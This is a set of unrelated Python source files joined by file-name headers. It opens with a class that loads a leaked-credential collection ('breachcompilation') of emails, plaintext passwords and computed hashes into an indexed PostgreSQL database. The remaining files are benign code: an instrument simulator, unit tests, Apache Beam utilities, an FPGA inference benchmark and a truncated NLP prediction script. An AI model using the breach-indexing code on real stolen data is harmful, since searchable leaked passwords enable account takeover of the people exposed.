self.password_db = password_db
if ('host' and 'port' and 'username' and 'password' and 'dbname') in dbparams.keys():
self.db_host = dbparams['host']
self.db_port = dbparams['port']
self.db_username = dbparams['username']
self.db_password = dbparams['password']
self.db_name = dbparams['dbname']
else:
self.logger.error("no database params provided!")
DBConnector.connect_psycopg(host=self.db_host, port=self.db_port, username=self.db_username,
password=self.db_password, dbname=self.db_name, minConn=1, maxConn=39)
# database instances
self.dbcreator = DBCreator()
self.dbfetcher = DBFetcher()
self.dbinserter = DBInserter()
# instances
self.password = Password()
# database schema structure
self.dbstructure = '0123456789abcdefghijklmnopqrstuvwxyz'
self.schema_list = list(self.dbstructure)
self.schema_list.append('symbols')
self.counter_passworddb = 1
self.chars = set('0123456789abcdefghijklmnopqrstuvwxyz')
self.db_entries_logger = db_entries_logger
self.counter = dict()
for i in self.chars:
self.counter.update({i: 1})
self.counter_sym = 1
# threads
self.threads = []
def create_schemas_and_tables(self, remove=False):
""" creates schemas and tables in database
"""
self.logger.info("create schemas and tables in database")
# start threads
for schema in self.schema_list:
if remove:
thread = threading.Thread(target=self.remove_schema_worker, args=(schema,))
else:
thread = threading.Thread(target=self.schema_worker, args=(schema,))
self.threads.append(thread)
thread.start()
for t in self.threads:
t.join()
    def schema_worker(self, schema):
        """ worker to create the schemas and tables in the database

        :param schema: specific schema
        """
        self.logger.info("create schema {}".format(schema))
        schema_sql = "create schema if not exists \"{}\"".format(schema)
        self.dbinserter.sql(sql=schema_sql)

        if schema == 'symbols':
            # Catch-all schema gets a single 'symbols' table; its columns
            # depend on whether this is a password-only or breach database.
            if self.password_db:
                table_sql = "create table if not exists \"{}\".symbols (password text primary key, length bigint, isNumber boolean, isSymbol boolean, ts text);".format(
                    schema)
            else:
                table_sql = "create table if not exists \"{}\".symbols (id bigint primary key, email text, password text, username text, provider text, sha1 varchar(40), sha256 varchar(64), sha512 varchar(128), md5 varchar(32));".format(
                    schema)
            self.dbinserter.sql(sql=table_sql)
        else:
            # Character schemas get one table per second character (including
            # a 'symbols' table, since schema_list contains it).
            for table in self.schema_list:
                if self.password_db:
                    table_sql = "create table if not exists \"{}\".\"{}\" (password text primary key, length bigint, isNumber boolean, isSymbol boolean, ts text);".format(
                        schema, table)
                else:
                    table_sql = "create table if not exists \"{}\".\"{}\" (id bigint primary key, email text, password text, username text, provider text, sha1 varchar(40), sha256 varchar(64), sha512 varchar(128), md5 varchar(32));".format(
                        schema, table)
                self.dbinserter.sql(sql=table_sql)
def remove_schema_worker(self, schema):
""" worker to remove the schemas and tables in the database
"""
self.logger.info("remove schema {}".format(schema))
drop_schema_sql = "drop schema \"{}\" cascade".format(schema)
self.dbinserter.sql(sql=drop_schema_sql)
    def insert_password_db(self, password):
        """ inserts password string into database table

        :param password: password string
        """
        if len(password) > 1:
            first_char_password = password[0].lower()
            second_char_password = password[1].lower()
            length_password = len(password)
            isSymbol = self.password.is_symbol(password)
            isNumber = self.password.is_number(password)
            # whole-second unix timestamp, stored as text
            utc_ts = str(time.time()).split('.')[0]

            if (first_char_password in self.chars) and (second_char_password in self.chars):
                # Route to the schema/table named after the first two characters.
                data = (password, length_password, isNumber, isSymbol, utc_ts)
                query_str = "insert into \"{}\".\"{}\"(password, length, isnumber, issymbol, ts) VALUES (%s, %s, %s, %s, %s)".format(
                    first_char_password, second_char_password)
                try:
                    self.dbinserter.row(sql=query_str, data=data, autocommit=True)
                    self.counter_passworddb += 1
                    if (self.counter_passworddb % self.db_entries_logger) == 0:
                        self.logger.info("Database entry {}: {}".format(self.counter_passworddb, str(data)))
                except DBIntegrityError as e:
                    # duplicate password (primary-key conflict): ignored on purpose
                    # self.logger.error(e)
                    pass
            else:
                # handle symbols
                data = (password, length_password, isNumber, isSymbol, utc_ts)
                query_str = "insert into symbols.symbols(password, length, isnumber, issymbol, ts) VALUES (%s, %s, %s, %s, %s)"
                try:
                    self.dbinserter.row(sql=query_str, data=data, autocommit=True)
                    self.counter_passworddb += 1
                    if (self.counter_passworddb % self.db_entries_logger) == 0:
                        self.logger.info("Database entry {}: {}".format(self.counter_passworddb, str(data)))
                except DBIntegrityError as e:
                    # duplicate password (primary-key conflict): ignored on purpose
                    # self.logger.error(e)
                    pass
        else:
            # password too short for the two-character routing scheme: skipped
            #self.logger.error("password to short for this database structure: {}".format(password))
            pass
def insert_breach_db(self, email, password, username, provider):
    """ inserts data from the breachcompilation collection into the database

    SHA-1/SHA-256/SHA-512/MD5 digests are derived here from the password and
    stored with the row. Rows are routed to the table named after the first
    two (lower-cased) characters of the email, or to symbols.symbols when
    either character is not a plain indexable character.

    :param email: email string
    :param password: password string
    :param username: username from email
    :param provider: provider from email
    """
    if len(email) > 1:
        first_char_email = email[0].lower()
        second_char_email = email[1].lower()
        sha1, sha256, sha512, md5 = self.password.generate_hashes(password=password)
        if (first_char_email in self.chars) and (second_char_email in self.chars):
            # row id comes from the per-first-character counter
            data = (self.counter[first_char_email], str(email), str(password), str(username), str(provider), str(sha1), str(sha256), str(sha512), str(md5))
            try:
                # table identifiers come from self.chars only, so format() is safe here
                query_str = "insert into \"{}\".\"{}\"(id, email, password, username, provider, sha1, sha256, sha512, md5) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)".format(first_char_email, second_char_email)
                self.dbinserter.row(sql=query_str, data=data, autocommit=True)
                self.counter[first_char_email] += 1
                if (self.counter[first_char_email] % self.db_entries_logger) == 0:
                    self.logger.info("Database entry {}: {}".format(self.counter[first_char_email], str(data)))
            except DBIntegrityError as e:
                # duplicate key: log and continue without advancing the counter
                self.logger.error(e)
            except Exception as e:
                # save data which are not inserted
                self.logger.error(e)
        else:
            # handle symbols: emails whose leading characters are not indexable
            data = (self.counter_sym, str(email), str(password), str(username), str(provider), str(sha1), str(sha256), str(sha512), str(md5))
            try:
                query_str = "insert into symbols.symbols(id, email, password, username, provider, sha1, sha256, sha512, md5) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)"
                self.dbinserter.row(sql=query_str, data=data, autocommit=True)
                self.counter_sym += 1
                if (self.counter_sym % self.db_entries_logger) == 0:
                    self.logger.info("Database entry {}: {}".format(self.counter_sym, str(data)))
            except DBIntegrityError as e:
                # duplicate key: log and continue without advancing the counter
                self.logger.error(e)
            except Exception as e:
                # save data which are not inserted
                self.logger.error(e)
    else:
        # email too short for this database structure
        pass
|
experiment.py | # -*- coding: utf-8 -*-
"""
lantz.simulators.experiment
~~~~~~~~~~~~~~~~~~~~~~~~~~~
An experiment connecting an actuator and a sensor.
:copyright: 2012 by The Lantz Authors
:license: BSD, see LICENSE for more details.
"""
from threading import Thread, activeCount
from time import sleep
import logging
import queue
from . import fungen, voltmeter, instrument
class StudiedObject(object):
    """Simulated physical object under study.

    Buffers actuator readings in a FIFO and, once ten readings have
    accumulated, exposes the oldest reading at half amplitude.
    """

    def __init__(self, read_from_actuator):
        self.read = read_from_actuator
        self.memory = queue.Queue()
        self._present_value = 0

    def action(self):
        # Sample the actuator and enqueue the reading.
        self.memory.put(self.read())
        # Report zero until at least ten readings are buffered; afterwards
        # consume the oldest one at half amplitude.
        if self.memory.qsize() >= 10:
            self._present_value = 0.5 * self.memory.get()
        else:
            self._present_value = 0

    def present_value(self):
        return self._present_value
class Namespace():
    """Minimal argparse.Namespace stand-in carrying a TCP endpoint."""

    def __init__(self, host, port):
        self.host, self.port = host, port
def create_actuator_server(actuator):
    """Serve the function-generator instrument over TCP on localhost:5678.

    Blocks until interrupted (Ctrl-C); always shuts the server down.
    """
    logging.info('Creating fungen server')
    actuator_server = instrument.main_tcp(actuator, Namespace('localhost', 5678))
    logging.info('Fungen: interrupt the program with Ctrl-C')
    try:
        actuator_server.serve_forever()
    except KeyboardInterrupt:
        logging.info('Fungen: Ending')
    finally:
        actuator_server.shutdown()
def create_sensor_server(sensor):
    """Serve the voltmeter instrument over TCP on localhost:5679.

    Blocks until interrupted (Ctrl-C); always shuts the server down.
    """
    logging.info('Creating voltmeter server')
    sensor_server = instrument.main_tcp(sensor, Namespace('localhost', 5679))
    logging.info('Voltmeter: interrupt the program with Ctrl-C')
    try:
        sensor_server.serve_forever()
    except KeyboardInterrupt:
        logging.info('Voltmeter: Ending')
    finally:
        sensor_server.shutdown()
def serve_forever(obj):
    """Drive the studied object while both instrument server threads live.

    Main thread + two server threads == 3 active threads; the loop stops
    as soon as either server thread dies, or on Ctrl-C.
    """
    try:
        while True:
            if activeCount() != 3:
                break
            obj.action()
            sleep(0.1)
    except KeyboardInterrupt:
        logging.info('Experiment: Ending.')
def main():
    """Wire up the experiment: function generator -> studied object -> voltmeter.

    Each instrument is served on its own daemon thread; the main thread then
    drives the studied object until a server dies or Ctrl-C.
    """
    fg = fungen.SimFunctionGenerator()
    obj = StudiedObject(fg.generator_output)
    vm = voltmeter.SimVoltmeter(obj.present_value, fg.generator_output)
    servers = [
        Thread(target=create_actuator_server, args=(fg,)),
        Thread(target=create_sensor_server, args=(vm,)),
    ]
    for worker in servers:
        # daemon threads so Ctrl-C in the main loop can end the process
        worker.daemon = True
        worker.start()
    sleep(1)
    serve_forever(obj)
# Run the simulated experiment when executed as a script.
if __name__ == "__main__":
    main()
|
test_generator_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import threading
from towhee.dataframe import DataFrame
from towhee.dataframe.iterators import MapIterator
from towhee.engine.operator_io import create_reader, create_writer
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.generator_runner import GeneratorRunner
from tests.unittests.mock_operators.generator_operator import generator_operator
def run(runner):
    """Thread target: drive the runner's processing loop to completion."""
    runner.process()
class TestGeneratorRunner(unittest.TestCase):
    """
    GeneratorRunner test
    """

    def _create_test_obj(self):
        # Build input/output DataFrames and a GeneratorRunner wired between them.
        input_df = DataFrame('input', [('num', 'int')])
        out_df = DataFrame('output', [('sum', 'int')])
        writer = create_writer('generator', [out_df])
        reader = create_reader(input_df, 'generator', {'num': 0})
        runner = GeneratorRunner('test', 0, 'generator_operator', 'main',
                                 'mock_operators', {'num': 1}, [reader], writer)
        return input_df, out_df, runner

    def test_generator_runner(self):
        """A single input of 10 should generate the ten values 0..9."""
        input_df, out_df, runner = self._create_test_obj()
        runner.set_op(generator_operator.GeneratorOperator())
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        input_df.put({'num': 10})
        input_df.seal()
        t.join()
        runner.join()
        out_df.seal()
        it = MapIterator(out_df, True)
        res = 0
        for item in it:
            self.assertEqual(item[0][0], res)
            res += 1
        self.assertEqual(out_df.size, 10)
        self.assertEqual(runner.status, RunnerStatus.FINISHED)

    def test_generator_runner_with_multidata(self):
        """Two inputs (10 and 5) should generate 15 rows in total."""
        input_df, out_df, runner = self._create_test_obj()
        runner.set_op(generator_operator.GeneratorOperator())
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        input_df.put({'num': 10})
        input_df.put({'num': 5})
        input_df.seal()
        t.join()
        runner.join()
        out_df.seal()
        self.assertEqual(out_df.size, 15)
        self.assertEqual(runner.status, RunnerStatus.FINISHED)

    def test_generator_runner_with_multirunners(self):
        """Chain two runners: the first's output DataFrame feeds the second."""
        input_df_1, out_df_1, runner_1 = self._create_test_obj()
        out_df_2 = DataFrame('output', [('sum', 'int')])
        writer = create_writer('generator', [out_df_2])
        reader = create_reader(out_df_1, 'generator', {'num': 0})
        runner_2 = GeneratorRunner('test', 0, 'generator_operator', 'main',
                                   'mock_operators', {'num': 1}, [reader], writer)
        runner_1.set_op(generator_operator.GeneratorOperator())
        t1 = threading.Thread(target=run, args=(runner_1, ))
        t1.start()
        runner_2.set_op(generator_operator.GeneratorOperator())
        t2 = threading.Thread(target=run, args=(runner_2, ))
        t2.start()
        input_df_1.put({'num': 1})
        input_df_1.put({'num': 2})
        input_df_1.put({'num': 3})
        input_df_1.seal()
        t1.join()
        runner_1.join()
        # In engine, the op_ctx will do it
        out_df_1.seal()
        t2.join()
        runner_2.join()
        out_df_2.seal()
        self.assertEqual(runner_1.status, RunnerStatus.FINISHED)
        self.assertEqual(runner_2.status, RunnerStatus.FINISHED)
        self.assertEqual(out_df_2.size, 4)
        it = MapIterator(out_df_2, True)
        expect = ['1-2', '2-4', '2-5', '2-5']
        index = 0
        for item in it:
            self.assertEqual(item[0][-1].parent_path, expect[index])
            index += 1

    def test_generator_runner_with_error(self):
        """A non-integer input must drive the runner into the FAILED state."""
        input_df, _, runner = self._create_test_obj()
        runner.set_op(generator_operator.GeneratorOperator())
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        input_df.put({'num': 'error_data'})
        runner.join()
        self.assertEqual(runner.status, RunnerStatus.FAILED)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
sideinputs.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utilities for handling side inputs."""
from __future__ import absolute_import

import collections
import collections.abc
import logging
import queue
import threading
import traceback

from builtins import object
from builtins import range

from apache_beam.coders import observable
from apache_beam.io import iobase
from apache_beam.runners.worker import opcounters
from apache_beam.transforms import window
# This module is experimental. No backwards-compatibility guarantees.
# Maximum number of reader threads for reading side input sources, per side
# input.
MAX_SOURCE_READER_THREADS = 15
# Number of slots for elements in side input element queue. Note that this
# value is intentionally smaller than MAX_SOURCE_READER_THREADS so as to reduce
# memory pressure of holding potentially-large elements in memory. Note that
# the number of pending elements in memory is equal to the sum of
# MAX_SOURCE_READER_THREADS and ELEMENT_QUEUE_SIZE.
ELEMENT_QUEUE_SIZE = 10
# Special element value sentinel for signaling reader state.
READER_THREAD_IS_DONE_SENTINEL = object()
# Used to efficiently window the values of non-windowed side inputs.
_globally_windowed = window.GlobalWindows.windowed_value(None).with_value
_LOGGER = logging.getLogger(__name__)
class PrefetchingSourceSetIterable(object):
    """Value iterator that reads concurrently from a set of sources.

    A pool of daemon reader threads drains `sources_queue` and pushes windowed
    elements onto a bounded `element_queue`; `__iter__` consumes that queue
    until every reader has posted its done-sentinel. Single use only.
    """

    def __init__(self,
                 sources,
                 max_reader_threads=MAX_SOURCE_READER_THREADS,
                 read_counter=None):
        self.sources = sources
        # Never start more threads than there are sources to read.
        self.num_reader_threads = min(max_reader_threads, len(self.sources))
        # Queue for sources that are to be read.
        self.sources_queue = queue.Queue()
        for source in sources:
            self.sources_queue.put(source)
        # Queue for elements that have been read.
        self.element_queue = queue.Queue(ELEMENT_QUEUE_SIZE)
        # Queue for exceptions encountered in reader threads; to be rethrown.
        self.reader_exceptions = queue.Queue()
        # Whether we have already iterated; this iterable can only be used once.
        self.already_iterated = False
        # Whether an error was encountered in any source reader.
        self.has_errored = False
        self.read_counter = read_counter or opcounters.NoOpTransformIOCounter()
        self.reader_threads = []
        self._start_reader_threads()

    def add_byte_counter(self, reader):
        """Adds byte counter observer to a side input reader.

        Args:
          reader: A reader that should inherit from ObservableMixin to have
            bytes tracked.
        """
        def update_bytes_read(record_size, is_record_size=False, **kwargs):
            # Let the reader report block size.
            if is_record_size:
                self.read_counter.add_bytes_read(record_size)
        if isinstance(reader, observable.ObservableMixin):
            reader.register_observer(update_bytes_read)

    def _start_reader_threads(self):
        # Daemon threads so a stuck reader cannot keep the process alive.
        for _ in range(0, self.num_reader_threads):
            t = threading.Thread(target=self._reader_thread)
            t.daemon = True
            t.start()
            self.reader_threads.append(t)

    def _reader_thread(self):
        # Reader thread body: drain sources from sources_queue and push their
        # (windowed) elements onto element_queue. The sentinel is ALWAYS posted
        # on exit -- __iter__ relies on receiving one sentinel per thread.
        # pylint: disable=too-many-nested-blocks
        try:
            while True:
                try:
                    source = self.sources_queue.get_nowait()
                    if isinstance(source, iobase.BoundedSource):
                        for value in source.read(source.get_range_tracker(None, None)):
                            if self.has_errored:
                                # If any reader has errored, just return.
                                return
                            if isinstance(value, window.WindowedValue):
                                self.element_queue.put(value)
                            else:
                                self.element_queue.put(_globally_windowed(value))
                    else:
                        # Native dataflow source.
                        with source.reader() as reader:
                            # The tracking of time spend reading and bytes read from side
                            # inputs is kept behind an experiment flag to test performance
                            # impact.
                            self.add_byte_counter(reader)
                            returns_windowed_values = reader.returns_windowed_values
                            for value in reader:
                                if self.has_errored:
                                    # If any reader has errored, just return.
                                    return
                                if returns_windowed_values:
                                    self.element_queue.put(value)
                                else:
                                    self.element_queue.put(_globally_windowed(value))
                except queue.Empty:
                    # No more sources to read: this thread is done.
                    return
        except Exception as e:  # pylint: disable=broad-except
            _LOGGER.error('Encountered exception in PrefetchingSourceSetIterable '
                          'reader thread: %s', traceback.format_exc())
            self.reader_exceptions.put(e)
            self.has_errored = True
        finally:
            self.element_queue.put(READER_THREAD_IS_DONE_SENTINEL)

    def __iter__(self):
        # Single-use generator yielding the elements produced by reader threads.
        # pylint: disable=too-many-nested-blocks
        if self.already_iterated:
            raise RuntimeError(
                'Can only iterate once over PrefetchingSourceSetIterable instance.')
        self.already_iterated = True
        # The invariants during execution are:
        # 1) A worker thread always posts the sentinel as the last thing it does
        #    before exiting.
        # 2) We always wait for all sentinels and then join all threads.
        num_readers_finished = 0
        try:
            while True:
                try:
                    # Only the blocking wait is attributed to the read counter.
                    with self.read_counter:
                        element = self.element_queue.get()
                    if element is READER_THREAD_IS_DONE_SENTINEL:
                        num_readers_finished += 1
                        if num_readers_finished == self.num_reader_threads:
                            return
                    else:
                        yield element
                finally:
                    if self.has_errored:
                        raise self.reader_exceptions.get()
        except GeneratorExit:
            # Consumer abandoned us early; tell readers to stop producing.
            self.has_errored = True
            raise
        finally:
            # Drain the remaining sentinels so reader threads can exit, then join.
            while num_readers_finished < self.num_reader_threads:
                element = self.element_queue.get()
                if element is READER_THREAD_IS_DONE_SENTINEL:
                    num_readers_finished += 1
            for t in self.reader_threads:
                t.join()
def get_iterator_fn_for_sources(sources,
                                max_reader_threads=MAX_SOURCE_READER_THREADS,
                                read_counter=None):
    """Returns callable that returns iterator over elements for given sources."""
    # Each call builds a fresh prefetching iterable (they are single-use).
    return lambda: iter(
        PrefetchingSourceSetIterable(
            sources,
            max_reader_threads=max_reader_threads,
            read_counter=read_counter))
class EmulatedIterable(collections.abc.Iterable):
    """Emulates an iterable for a side input.

    Each iteration calls `iterator_fn` to obtain a fresh iterator, so the
    object can be iterated more than once.

    NOTE: inherits from collections.abc.Iterable; the bare collections.Iterable
    alias was removed in Python 3.10.
    """

    def __init__(self, iterator_fn):
        self.iterator_fn = iterator_fn

    def __iter__(self):
        return self.iterator_fn()
|
inception_v1_mt.py | """ (c) Copyright 2019 Xilinx, Inc. All rights reserved.
--
-- This file contains confidential and proprietary information
-- of Xilinx, Inc. and is protected under U.S. and
-- international copyright and other intellectual property
-- laws.
--
-- DISCLAIMER
-- This disclaimer is not a license and does not grant any
-- rights to the materials distributed herewith. Except as
-- otherwise provided in a valid license issued to you by
-- Xilinx, and to the maximum extent permitted by applicable
-- law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
-- WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
-- AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
-- BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
-- INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
-- (2) Xilinx shall not be liable (whether in contract or tort,
-- including negligence, or under any other theory of
-- liability) for any loss or damage of any kind or nature
-- related to, arising under or in connection with these
-- materials, including for any direct, or any indirect,
-- special, incidental, or consequential loss or damage
-- (including loss of data, profits, goodwill, or any type of
-- loss or damage suffered as a result of any action brought
-- by a third party) even if such damage or loss was
-- reasonably foreseeable or Xilinx had been advised of the
-- possibility of the same.
--
-- CRITICAL APPLICATIONS
-- Xilinx products are not designed or intended to be fail-
-- safe, or for use in any application requiring fail-safe
-- performance, such as life-support or safety devices or
-- systems, Class III medical devices, nuclear facilities,
-- applications related to the deployment of airbags, or any
-- other applications that could lead to death, personal
-- injury, or severe property or environmental damage
-- (individually and collectively, "Critical
-- Applications"). Customer assumes the sole risk and
-- liability of any use of Xilinx products in Critical
-- Applications, subject only to applicable laws and
-- regulations governing limitations on product liability.
--
-- THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
-- PART OF THIS FILE AT ALL TIMES.
"""
from ctypes import *
import cv2
import numpy as np
from dnndk import n2cube, dputils
import os
import threading
import time
import sys
# Guards updates to the per-thread `count` stride below.
l = threading.Lock()


def RunDPU(kernel, img, count):
    """
    DPU run function
    kernel: dpu kernel
    img: image to be run
    count : test rounds count (this thread's starting offset; each thread
            strides by the global thread count so all threads together
            perform ~1000 iterations)
    """
    """Create DPU Tasks from DPU Kernel"""
    task = n2cube.dpuCreateTask(kernel, 0)
    while count < 1000:
        """Load image to DPU"""
        dputils.dpuSetInputImage2(task, KERNEL_CONV_INPUT, img)
        """Get input Tesor"""
        tensor = n2cube.dpuGetInputTensor(task, KERNEL_CONV_INPUT)
        """Model run on DPU"""
        n2cube.dpuRunTask(task)
        """Get the output tensor size from FC output"""
        size = n2cube.dpuGetOutputTensorSize(task, KERNEL_FC_OUTPUT)
        """Get the output tensor channel from FC output"""
        channel = n2cube.dpuGetOutputTensorChannel(task, KERNEL_FC_OUTPUT)
        softmax = [0 for i in range(size)]
        """Get FC result"""
        conf = n2cube.dpuGetOutputTensorAddress(task, KERNEL_FC_OUTPUT)
        n2cube.dpuGetTensorData(conf, softmax, size)
        """Get output scale of FC"""
        outputScale = n2cube.dpuGetOutputTensorScale(task, KERNEL_FC_OUTPUT)
        """Run softmax"""
        n2cube.dpuRunSoftmax(conf, softmax, channel, size // channel, outputScale)
        l.acquire()
        # NOTE(review): `count` is a local variable, so the lock only
        # serializes reads of the global `threadnum` here -- confirm intent.
        count = count + threadnum
        l.release()
    """Destroy DPU Tasks & free resources"""
    n2cube.dpuDestroyTask(task)
# NOTE(review): `global` at module level is a no-op; kept as-is.
global threadnum
# Number of worker threads; set from argv[1] in main().
threadnum = 0
# DPU kernel name and its input/output node names for GoogLeNet (Inception v1).
KERNEL_CONV = "inception_v1_0"
KERNEL_CONV_INPUT = "conv1_7x7_s2"
KERNEL_FC_OUTPUT = "loss3_classifier"
"""
brief Entry for runing GoogLeNet neural network
"""
def main(argv):
    """Run GoogLeNet on the DPU with argv[1] worker threads and print FPS."""
    """Attach to DPU driver and prepare for runing"""
    n2cube.dpuOpen()
    """Create DPU Kernels for GoogLeNet"""
    kernel = n2cube.dpuLoadKernel(KERNEL_CONV)
    # All threads classify the same (first) image from the sample directory.
    image_path = "./../common/image_224_224/"
    listimage = os.listdir(image_path)
    path = os.path.join(image_path, listimage[0])
    print("Loading %s" %listimage[0])
    img = cv2.imread(path)
    threadAll = []
    global threadnum
    threadnum = int(argv[1])
    print("Input thread number is: %d" %threadnum)
    time1 = time.time()
    # Each thread starts at offset i and strides by threadnum (see RunDPU).
    for i in range(int(threadnum)):
        t1 = threading.Thread(target=RunDPU, args=(kernel, img, i))
        threadAll.append(t1)
    for x in threadAll:
        x.start()
    for x in threadAll:
        x.join()
    time2 = time.time()
    timetotal = time2 - time1
    # The threads collectively process ~1000 frames, hence 1000 / elapsed.
    fps = float(1000 / timetotal)
    print("%.2f FPS" %fps)
    """Destroy DPU Tasks & free resources"""
    rtn = n2cube.dpuDestroyKernel(kernel)
    """Dettach from DPU driver & release resources"""
    n2cube.dpuClose()
# Script entry point: expects exactly one argument, the worker thread count.
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("please input thread number.")
    else :
        main(sys.argv)
|
predict.py | #
# Copyright (c) 2018, Salesforce, Inc.
# The Board of Trustees of the Leland Stanford Junior University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import logging
import os
from pprint import pformat
from collections import defaultdict
import copy
import shutil
# multiprocessing with CUDA
from torch.multiprocessing import Process, set_start_method
try:
set_start_method('spawn')
except RuntimeError:
pass
import torch
from . import models
from .data_utils.embeddings import load_embeddings
from .tasks.registry import get_tasks
from .util import set_seed, preprocess_examples, load_config_json, make_data_loader, log_model_size, init_devices, \
have_multilingual, combine_folders_on_disk, split_folder_on_disk, get_part_path
from .validate import generate_with_model, calculate_and_reduce_metrics
logger = logging.getLogger(__name__)
def get_all_splits(args):
    """Load the evaluation (valid or test) split for every task in args.tasks.

    Returns a list with one entry per task; each entry is a list of processed
    splits (one per language when the task ships several).

    :raises ValueError: if args.evaluate is neither 'valid' nor 'test'
    """
    splits = []
    # Broadcast a single language spec across all tasks.
    if len(args.pred_languages) == 1 and len(args.tasks) > 1:
        args.pred_languages *= len(args.tasks)
    for i, task in enumerate(args.tasks):
        task_languages = args.pred_languages[i]
        logger.info(f'Loading {task}')
        kwargs = {'train': None}
        if args.evaluate == 'valid':
            kwargs['test'] = None
            if args.pred_set_name is not None:
                kwargs['validation'] = args.pred_set_name
        elif args.evaluate == 'test':
            kwargs['validation'] = None
        else:
            raise ValueError('Split used for prediction should be either valid or test')
        kwargs.update({'skip_cache': args.skip_cache, 'subsample': args.subsample,
                       'cached_path': os.path.join(args.cache, task.name), 'all_dirs': task_languages,
                       'almond_lang_as_question': args.almond_lang_as_question})
        kwargs['separate_eval'] = args.separate_eval
        task_splits = task.get_splits(root=args.data, lower=args.lower, **kwargs)
        if not isinstance(task_splits, list):
            task_splits = [task_splits]
        task_split_processed = []
        for split in task_splits:
            # Exactly one of eval/test must be present; train/aux must not be.
            assert (split.eval or split.test) and not split.train and not split.aux
            split = split.eval if split.eval else split.test
            preprocess_examples(args, [task], [split], train=False)
            task_split_processed.append(split)
        splits.append(task_split_processed)
    return splits
def prepare_data(args, numericalizer, embeddings):
    """Load all prediction splits and grow the vocabulary/embeddings to cover them."""
    splits = get_all_splits(args)
    logger.info(f'Vocabulary has {numericalizer.num_tokens} tokens from training')
    new_words = []
    for task_splits in splits:
        for split in task_splits:
            new_words += numericalizer.grow_vocab(split)
    logger.info(f'Vocabulary has expanded to {numericalizer.num_tokens} tokens')
    # Extend every embedding matrix so the new vocabulary entries have vectors.
    for emb in embeddings:
        emb.grow_for_vocab(numericalizer.vocab, new_words)
    return splits
def run(args, device):
    """Run prediction/evaluation for all tasks on a single device.

    Loads embeddings and the trained model from args.path, builds one data
    loader per task (and per language when --separate_eval is set), writes a
    .tsv prediction file and a .results.json metrics file per task/language
    under <args.eval_dir>/<args.evaluate>, and logs the overall decaScore.

    :raises OSError: if an output file already exists and --overwrite is unset
    """
    numericalizer, context_embeddings, question_embeddings, decoder_embeddings = \
        load_embeddings(args.embeddings, args.context_embeddings, args.question_embeddings, args.decoder_embeddings,
                        args.max_generative_vocab, logger)
    numericalizer.load(args.path)
    for emb in set(context_embeddings + question_embeddings + decoder_embeddings):
        emb.init_for_vocab(numericalizer.vocab)
    logger.info(f'Initializing Model')
    Model = getattr(models, args.model)
    model = Model.from_pretrained(args.path,
                                  numericalizer=numericalizer,
                                  context_embeddings=context_embeddings,
                                  question_embeddings=question_embeddings,
                                  decoder_embeddings=decoder_embeddings,
                                  args=args,
                                  device=device
                                  )
    val_sets = prepare_data(args, numericalizer, set(context_embeddings + question_embeddings + decoder_embeddings))
    logger.info(f'Preparing iterators')
    # Broadcast a single batch size across all tasks.
    if len(args.val_batch_size) == 1 and len(val_sets) > 1:
        args.val_batch_size *= len(val_sets)
    iters = []
    task_index = 0
    for task, bs, val_set in zip(args.tasks, args.val_batch_size, val_sets):
        task_iter = []
        task_languages = args.pred_languages[task_index]
        # Multilingual task evaluated per language: one loader per split.
        if task_languages is not None and args.separate_eval:
